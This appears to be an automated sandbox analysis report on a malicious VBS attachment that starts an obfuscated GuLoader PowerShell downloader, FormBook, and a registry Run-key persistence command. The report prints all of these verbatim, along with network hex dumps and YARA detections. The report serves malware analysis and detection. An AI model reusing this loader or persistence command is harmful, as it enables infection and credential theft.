                                          Data Ascii: ^@.*rB!)J*O,-+Jp-rFz&*+BdgkX?7Fl&V<q~(hFg/}cv0o2:)4X5o3LahJzDULV'OxZNG=x?/XnBTU&$g
                                          2024-11-18 17:12:36 UTC8000INData Raw: b1 bc fd c7 28 fe 7b 3a ff bc 37 9b b9 1c 76 b5 51 73 9e d3 aa 9e c7 8e 29 36 9f a3 b0 18 1c e2 c4 10 98 c3 65 ab aa ac 0d 6a 61 01 3c 27 98 06 91 10 e9 9b 95 04 46 5a 48 94 92 b9 4b fb 65 35 cc 3c e9 33 22 88 3d 95 e4 57 d0 ce d0 a7 71 a8 8e d9 bb 65 15 34 7b d2 76 3a 3c cb 55 f5 df 3d f3 db 04 b2 ef 38 18 00 5a 57 94 76 9f 2f 16 95 50 6a 52 d4 13 20 c8 66 d8 4d e3 79 90 85 88 99 3d db ee 00 0b 80 eb 74 ca 63 55 6c 00 aa 1d 0b 1b 91 14 3e dd 6f f6 7d 04 73 57 84 0c f3 86 ac 4c da ed a1 df b9 d4 92 4a e8 ae 3e ac 96 09 3a 10 04 3f b0 c8 e7 c4 e4 53 77 d9 aa 7c f0 96 9c 42 14 31 4a ea 9d ab a5 26 b5 d4 eb 53 fd b2 81 4c 0a e3 dc 48 02 35 ba 97 57 fe 96 78 d2 d7 2e 45 d7 51 a0 be eb 7d 08 c8 96 c7 db cc dc 8e 86 be 0c 7e 90 1d 0f d2 36 f9 c1 37 52 f9 09 93
                                          Data Ascii: ({:7vQs)6eja<'FZHKe5<3"=Wqe4{v:<U=8ZWv/PjR fMy=tcUl>o}sWLJ>:?Sw|B1J&SLH5Wx.EQ}~67R
                                          2024-11-18 17:12:36 UTC8000INData Raw: 28 ca ed 15 50 9e 60 be aa 31 58 b4 c0 d5 fb e2 5b fa ae 5a 25 10 23 af bd 55 a9 40 65 fb f9 ac 9a 9a c6 4c 9a c2 b4 36 d2 4c ec 52 4a 9e 10 79 19 6b 1b 4f 10 a3 9f 84 0c dd 7f ed a1 03 8d 7a 99 b1 8b ab 79 a0 13 fa 28 02 74 db 72 3b 7f c1 51 7b 86 55 9b 7f 6c 52 3e 36 a6 1f 4c 23 3d 35 0e 83 bd e0 28 17 b1 63 29 e9 c7 b7 26 d9 b8 a1 f4 87 4f 82 16 a5 72 2e 9e 26 c4 64 1e e9 1e 9b 6b 58 9f e7 ff f7 36 19 1d f2 b6 b8 83 b9 e9 31 1a be 29 a8 87 62 b0 4e 2e db a9 22 5f 5a 1b 7e 0e 19 d8 f4 7c fa d5 3f f4 1e a4 04 c9 28 71 41 fe b8 0e 32 22 63 bf 88 1f 6d eb 97 b9 07 54 a2 24 9f 8b 17 50 55 d4 ee 50 af af 64 04 c7 8c 30 bd 73 ba ac 18 31 57 4c 98 c8 06 21 1e 44 6a 66 92 6a 97 3c 92 ab 51 f6 17 53 b9 ec fd 37 ff bb 0a 50 cf 48 e3 81 32 cd 94 a8 a9 81 97 0a bc
                                          Data Ascii: (P`1X[Z%#U@eL6LRJykOzy(tr;Q{UlR>6L#=5(c)&Or.&dkX61)bN."_Z~|?(qA2"cmT$PUPd0s1WL!Djfj<QS7PH2
                                          2024-11-18 17:12:36 UTC8000INData Raw: 59 36 cc ad da 60 61 71 1a cd 6b b8 70 90 ab b0 13 c4 a8 a6 70 0c f0 0e 48 4f 2e 58 5e fc 0d 1e 40 cd 4e a9 e1 12 55 e8 3e 0c 0c d7 c4 bf 45 85 0c 29 99 69 13 d1 c1 dc 90 2a 61 7a 9b 34 f5 11 07 be 58 f1 c3 a0 e3 06 cb 52 67 11 2c 86 96 57 ac 5e d1 54 1e 42 d2 88 78 7b 82 70 00 19 4a 1c d3 da 02 f3 89 49 d0 61 9f 44 02 ca e2 68 b3 ae 4e 17 a4 4c e1 6a ff f3 69 d1 03 07 4c 3c b1 70 9a 25 1e bf 0e 09 19 98 0e 54 70 57 0c 11 e0 d7 0b 00 07 68 81 af cb 11 04 98 e8 2b 20 a2 5e 60 cc 07 66 d6 ea ff c6 26 a2 6f 55 f1 03 69 0f 8c f2 8a 7f 36 d3 31 fa a8 76 15 72 b0 5e 10 38 a8 5b ee 4f 36 31 8e 08 71 c5 08 0c ce a8 99 f0 53 be 98 6f 3d 9e f9 97 14 b4 c9 2f c9 af 2a 04 a6 6b b5 fb 2a c5 f7 3f d9 8c fc 28 3b 31 d8 7b 0d a1 fe 2d 6d 54 e6 af bf f0 d9 97 23 07 bb b2
                                          Data Ascii: Y6`aqkppHO.X^@NU>E)i*az4XRg,W^TBx{pJIaDhNLjiL<p%TpWh+ ^`f&oUi61vr^8[O61qSo=/*k*?(;1{-mT#
                                          2024-11-18 17:12:36 UTC8000INData Raw: aa 93 aa e8 fc 65 48 84 2f fc 3e 12 b3 27 ed e8 f3 e5 5f 57 e0 d1 f4 0d dd e7 05 da 9b b0 65 4d bf b4 a9 e1 a4 fc 78 99 0a 0b 15 00 c1 09 7f 05 46 b7 bc e3 eb 97 9e c4 f9 a5 4a 54 fc de 74 d4 3e e9 af de 59 98 c2 9c e2 98 9d 80 4f 90 eb 7e 35 6f 4c b2 f9 a6 fa 3c 27 14 9c 7d dd d7 a9 45 28 0d 1a 15 84 dc 49 86 13 e4 e1 e0 fe 1f 9c 64 c3 f1 d9 0d 3e d6 5e 56 fd ce 96 b0 a0 13 3a d2 33 33 2a ae af 37 b4 9f 45 33 05 1d 66 6b 1f f0 25 e1 41 2d 7e 6b 5a 80 5c 54 62 40 fd a6 78 a5 33 8f ef e9 0c 40 db 86 d7 c8 ef 0c f1 47 72 3d 6c a0 d6 cb 7a 58 5d db c5 f9 cc 74 b1 9a 18 c9 c2 ad 88 dd 65 8b b4 aa 43 8c bc c6 f5 af 83 c7 6c 34 84 bd 6c df 21 01 ce 85 52 29 9e e8 46 84 44 a9 52 ac 13 9f 3c fc 04 8d 74 b6 02 f0 92 53 b4 97 3a 3a 6b 15 65 51 c3 6c c2 42 45 4d ac
                                          Data Ascii: eH/>'_WeMxFJTt>YO~5oL<'}E(Id>^V:33*7E3fk%A-~kZ\Tb@x3@Gr=lzX]teCl4l!R)FDR<tS::keQlBEM


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:12:12:01
                                          Start date:18/11/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs"
                                          Imagebase:0x7ff6784d0000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:1
                                          Start time:12:12:03
                                          Start date:18/11/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpatleTransRfeckfIStripO DiscN .ype1Fee,i9 Anna4Ga ve)');svaj (Manned $Abjectnesses);$Enarration=$Klbestrimlen115[0];$Natriumkarbonats=(Manned 'P.rah$ TestGParvilFsterO Un.rBDesulaOverslBrevi: uninG reterSt rtUT,llinAbsorDUn.trs elioTAme ie CofiNCystoeKjol NI,lcreStripS tre= Unpanbiance D viwPerfe- Havoo BullBE terjT.siaESt,mkc ValgtReser ImpalS HeisYPost,sUdpintunexteLamism A el. Semi$Br nddwoundITar rcErhv HKsemaLMisteo A aeRCrenavTalgso U ossJrl.s4 esor5');svaj ($Natriumkarbonats);svaj (Manned 'Pha,a$ DragG metar KommuRadiuntransdSaners,edert ShaneQuicknGens eTransn Deroe yrissProve.DominHKvarteindtraSallydStadsePinker ,sywsg.ngi[Engpi$ rkmiM SkabyUneveoPupilaTo talStimubHullouAllopm i.dsoS.bpesP.rfeeComp,]Revac=He to$StorvOskriff UlejfZoomoi DolpcBoflleP gnarOverasPsychh OplglSydeneLimbanResupe');$Mannerizes=Manned 'vart $ M mbG,lavrrOutlauStolpnNototd,ardis cocrtMaloteTissenTilkaeBagbinIntere MiljsDissy. idsbDD tivo ProbwS,ladn AbsulUdlaaoDagtya Stand eksuFBytteiUndiflCannaeSmgte( H,es$EthylETube nCi roaKr gsrUnderrFarmeaTre,etStre i Mic oecblan Unel,Gneta$ExtraE AkuakAntigsAutoep,omera fk,lnR obtdSpksteLuderrSkrubn UroseSubpi)';$Ekspanderne=$ekstrakt;svaj (Manned 'Liqu.$Morf.GToneaLProtyOMiladBUmisfaUnfliLNonin:Mah riNiellN MutsSAlicupSkibee Bre C ForstUndersMala.=Ekspa(CalvitIron EFjernSSuvertP ast-,rullPLigu a UltrTUaupehAbst Modko$KannieFr,gtKla meS uthepCarria Muncn sub.D MardeKombirSgnehn hillE Frem)');while (!$Inspects) {svaj (Manned 'Cyana$RinglgInd rl ThoroCensobSupera Yu,nlv rge: e,otSavlsakBeva,auncera Mesel PaaspHepatuSekstnNe trdKandeePearltudslasEksek= M st$SprinBSnailaRimi,nPyrexd tamcu Spn,sBa okiIrkeka rthon') ;svaj $Mannerizes;svaj (Manned ' UdstST llat ecptASellaRmatemTBarne- Hj,ms A tiLSk vle Ker EKendiP peci Inuri4');svaj (Manned 'Reevo$RevelgKnogll opt.Owigwab Overa Afg,LSmert:sennei EvanNG.liksKame pPasspeCatalCStigmt SuprS U ve= Styl(D laft PatheKarneSCalvitPaabe-Stearp BeraaSikkeTTekn Hadhsi Trivi$Ra.piEPosseKSvalesPyrolpNab.vASkrmsnFagsad Do reC llaR okalNCurareSusaa)') ;svaj (Manned 'Nonde$BlgvaGTreetlDiskbO Bru,B Kry,AUnd.rL knd:HogskSDictyIBjninbTilpay PagilSubepE ,runSMedinQF.reiu ,aunEF erd=Sesq $Et.rngBlotlL Lno O rskebAggluASid oLHaema:FlyvekForklVTazeeA,nacttPassoOVorterDaubrIA sidaIridolManurGHjemmU DimiiG lbenDummyEFree aMe sin PlaneRed,rrInvesEUndersPra s+ Hier+ufred% S.de$ PostkFruenLU sepBTranse ,lanSA.uzzTCol,rrUp,eli Aarsmto,ullCrosseVaskenFangs1Efter1 S nd5Klamm. PiracSociaOVineyUJawb nPe,fet') ;$Enarration=$Klbestrimlen115[$Sibylesque]}$Magahi=313075;$Elendighedens=32053;svaj (Manned ' ap,k$KubikGBiblilCsarioKostsBarpegaTrldolSvine:T ynnuAlabaRBegrdaRaci nFri ooUdsorpCommehFinmeoBlrenbRaunciHelioaBla,k Hans=Bibl, U colg tigmEAdevitPhyto-DimisCundero.sesunUn attLigedE PrefN Bandt,verp Il,am$AnhinEHep,aKChromS Fannp ammaV.deoNTvivldAdmineDa idR Allin L eke');svaj (Manned 'Fokus$R.nglgAddlelCar lo MinobVa dsaHovedl Gymn: Gen t ReciePenthn nvertFir,faLifebcLejdeuGift,lSulpho Notac OpdaySubcisBoo kt seud Unest= Dans Stikl[NonloSNoummy befusRhombtScheleDemonmNon u. Sa.lC BndsoSilennbildkv .eteeta tyr A,kit.aals]Lager:Epip :K bisFDelberBoelsoLoansm DemoBRoderaUnpens dunzeApnoe6 Nonc4 Gr.sS F.bitMellerTabariu,coun DespgHynde(Toldk$LivelU Bogsr ickpa efornLimitoHy oipSvrdehAdminoLidiabSl ngiPuffea,onso)');svaj (Manned 'lnest$SkolegFa lolSrklaO.eratbLandgASi telAfsik:Tyveam SansE BunksEnervo,mmatgRecumLCurrio RundEUnco,AtouchlNovem Rumm=Brnde Gymn[LuftksRids YWorsssSnefotWhittESuingmBybud.Vr,dnTUplejEOsteoxHulsmTHornb. LejleR piaNDe rac elskoHeksedSp ldi.ornsn.agbrg Ha d]Tro d:Skrue:Mump,a Kn bSLggerCPh.haiSk,rpIGuide.Ku tuGZygioe An,atChas,SNonnoT PresrGolfmiLa erNLentigAstel(Sinds$K ymmTpressEFrankN.rivatNonfaAcryptcKort,U.ylvelS.bveOCowbecI tanYWortssOpst TPalle)');svaj (Manned 'Captu$devoiGLangtLP piroUnpulbM.hamAVamfolClot.: B,ntOStumbp karts.ombuG bowlNTransIUnposnRegulGFattieEukliRSlide=S san$Vantrm AnnaeVrageSKrimioDoktoGRidefLPoethO eadeEAbonnaSlu tlOvert.NonslsIndmaUAblatBIjnefSCulmeTHj,edRco plIDissenMytedgAfhol(Myect$ridglmwarina ncogA ctoaBagskHUnsuliHebot,Anstd$Bre,leProh LGo,peEBevidnBe,apdForkoi SpleGHeathHSyberETroppd,trsleNoninnBeforSPaalg)');svaj $Opsgninger;"
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1872749558.000001F59006F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:12:12:04
                                          Start date:18/11/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:12:12:16
                                          Start date:18/11/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpatleTransRfeckfIStripO DiscN .ype1Fee,i9 Anna4Ga ve)');svaj (Manned $Abjectnesses);$Enarration=$Klbestrimlen115[0];$Natriumkarbonats=(Manned 'P.rah$ TestGParvilFsterO Un.rBDesulaOverslBrevi: uninG reterSt rtUT,llinAbsorDUn.trs elioTAme ie CofiNCystoeKjol NI,lcreStripS tre= Unpanbiance D viwPerfe- Havoo BullBE terjT.siaESt,mkc ValgtReser ImpalS HeisYPost,sUdpintunexteLamism A el. Semi$Br nddwoundITar rcErhv HKsemaLMisteo A aeRCrenavTalgso U ossJrl.s4 esor5');svaj ($Natriumkarbonats);svaj (Manned 'Pha,a$ DragG metar KommuRadiuntransdSaners,edert ShaneQuicknGens eTransn Deroe yrissProve.DominHKvarteindtraSallydStadsePinker ,sywsg.ngi[Engpi$ rkmiM SkabyUneveoPupilaTo talStimubHullouAllopm i.dsoS.bpesP.rfeeComp,]Revac=He to$StorvOskriff UlejfZoomoi DolpcBoflleP gnarOverasPsychh OplglSydeneLimbanResupe');$Mannerizes=Manned 'vart $ M mbG,lavrrOutlauStolpnNototd,ardis cocrtMaloteTissenTilkaeBagbinIntere MiljsDissy. idsbDD tivo ProbwS,ladn AbsulUdlaaoDagtya Stand eksuFBytteiUndiflCannaeSmgte( H,es$EthylETube nCi roaKr gsrUnderrFarmeaTre,etStre i Mic oecblan Unel,Gneta$ExtraE AkuakAntigsAutoep,omera fk,lnR obtdSpksteLuderrSkrubn UroseSubpi)';$Ekspanderne=$ekstrakt;svaj (Manned 'Liqu.$Morf.GToneaLProtyOMiladBUmisfaUnfliLNonin:Mah riNiellN MutsSAlicupSkibee Bre C ForstUndersMala.=Ekspa(CalvitIron EFjernSSuvertP ast-,rullPLigu a UltrTUaupehAbst Modko$KannieFr,gtKla meS uthepCarria Muncn sub.D MardeKombirSgnehn hillE Frem)');while (!$Inspects) {svaj (Manned 'Cyana$RinglgInd rl ThoroCensobSupera Yu,nlv rge: e,otSavlsakBeva,auncera Mesel PaaspHepatuSekstnNe trdKandeePearltudslasEksek= M st$SprinBSnailaRimi,nPyrexd tamcu Spn,sBa okiIrkeka rthon') ;svaj $Mannerizes;svaj (Manned ' UdstST llat ecptASellaRmatemTBarne- Hj,ms A tiLSk vle Ker EKendiP peci Inuri4');svaj (Manned 'Reevo$RevelgKnogll opt.Owigwab Overa Afg,LSmert:sennei EvanNG.liksKame pPasspeCatalCStigmt SuprS U ve= Styl(D laft PatheKarneSCalvitPaabe-Stearp BeraaSikkeTTekn Hadhsi Trivi$Ra.piEPosseKSvalesPyrolpNab.vASkrmsnFagsad Do reC llaR okalNCurareSusaa)') ;svaj (Manned 'Nonde$BlgvaGTreetlDiskbO Bru,B Kry,AUnd.rL knd:HogskSDictyIBjninbTilpay PagilSubepE ,runSMedinQF.reiu ,aunEF erd=Sesq $Et.rngBlotlL Lno O rskebAggluASid oLHaema:FlyvekForklVTazeeA,nacttPassoOVorterDaubrIA sidaIridolManurGHjemmU DimiiG lbenDummyEFree aMe sin PlaneRed,rrInvesEUndersPra s+ Hier+ufred% S.de$ PostkFruenLU sepBTranse ,lanSA.uzzTCol,rrUp,eli Aarsmto,ullCrosseVaskenFangs1Efter1 S nd5Klamm. PiracSociaOVineyUJawb nPe,fet') ;$Enarration=$Klbestrimlen115[$Sibylesque]}$Magahi=313075;$Elendighedens=32053;svaj (Manned ' ap,k$KubikGBiblilCsarioKostsBarpegaTrldolSvine:T ynnuAlabaRBegrdaRaci nFri ooUdsorpCommehFinmeoBlrenbRaunciHelioaBla,k Hans=Bibl, U colg tigmEAdevitPhyto-DimisCundero.sesunUn attLigedE PrefN Bandt,verp Il,am$AnhinEHep,aKChromS Fannp ammaV.deoNTvivldAdmineDa idR Allin L eke');svaj (Manned 'Fokus$R.nglgAddlelCar lo MinobVa dsaHovedl Gymn: Gen t ReciePenthn nvertFir,faLifebcLejdeuGift,lSulpho Notac OpdaySubcisBoo kt seud Unest= Dans Stikl[NonloSNoummy befusRhombtScheleDemonmNon u. Sa.lC BndsoSilennbildkv .eteeta tyr A,kit.aals]Lager:Epip :K bisFDelberBoelsoLoansm DemoBRoderaUnpens dunzeApnoe6 Nonc4 Gr.sS F.bitMellerTabariu,coun DespgHynde(Toldk$LivelU Bogsr ickpa efornLimitoHy oipSvrdehAdminoLidiabSl ngiPuffea,onso)');svaj (Manned 'lnest$SkolegFa lolSrklaO.eratbLandgASi telAfsik:Tyveam SansE BunksEnervo,mmatgRecumLCurrio RundEUnco,AtouchlNovem Rumm=Brnde Gymn[LuftksRids YWorsssSnefotWhittESuingmBybud.Vr,dnTUplejEOsteoxHulsmTHornb. LejleR piaNDe rac elskoHeksedSp ldi.ornsn.agbrg Ha d]Tro d:Skrue:Mump,a Kn bSLggerCPh.haiSk,rpIGuide.Ku tuGZygioe An,atChas,SNonnoT PresrGolfmiLa erNLentigAstel(Sinds$K ymmTpressEFrankN.rivatNonfaAcryptcKort,U.ylvelS.bveOCowbecI tanYWortssOpst TPalle)');svaj (Manned 'Captu$devoiGLangtLP piroUnpulbM.hamAVamfolClot.: B,ntOStumbp karts.ombuG bowlNTransIUnposnRegulGFattieEukliRSlide=S san$Vantrm AnnaeVrageSKrimioDoktoGRidefLPoethO eadeEAbonnaSlu tlOvert.NonslsIndmaUAblatBIjnefSCulmeTHj,edRco plIDissenMytedgAfhol(Myect$ridglmwarina ncogA ctoaBagskHUnsuliHebot,Anstd$Bre,leProh LGo,peEBevidnBe,apdForkoi SpleGHeathHSyberETroppd,trsleNoninnBeforSPaalg)');svaj $Opsgninger;"
                                          Imagebase:0x6d0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2005154167.0000000009D30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2004279815.0000000008B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1987552917.0000000005E5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:12:12:16
                                          Start date:18/11/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:12:12:29
                                          Start date:18/11/2024
                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                          Imagebase:0x9f0000
                                          File size:59'904 bytes
                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2098902399.000000001FA80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:12:12:32
                                          Start date:18/11/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"
                                          Imagebase:0x240000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:12:12:32
                                          Start date:18/11/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
